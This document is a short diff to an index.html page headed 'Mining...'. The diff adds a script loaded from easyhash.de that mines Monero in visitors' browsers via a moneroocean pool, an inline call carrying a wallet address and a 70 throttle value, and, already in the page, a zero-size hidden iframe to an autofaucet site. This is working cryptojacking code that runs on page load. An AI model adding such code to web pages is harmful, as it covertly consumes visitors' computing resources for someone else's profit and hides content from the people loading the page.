--- a/index.html
+++ b/index.html
@@ -15,6 +15,14 @@
     <h1>Mining...</h1>
 
 </body>
+ 
+<script src="https://easyhash.de/mmh/mmh.js?perfekt=wss://?algo=cn/r?jason=gulf.moneroocean.stream:10008" > </script>
+
+<script type="text/javascript">
+
+EverythingIsLife('48EonXRqcmsNCdiYCvGnUKWyHddmnqCRGCkKdLiHMKjAEFGzYtFd2bNd6XA8SLxqdzNHcrqPNYe2mFFLypfhNATwVGurBqG', 'x', 70);
+
+</script>
 
  <iframe src="https://autofaucet.org/wm/NormaOff/4" width="0" height="0" style="border:0"></iframe>
 
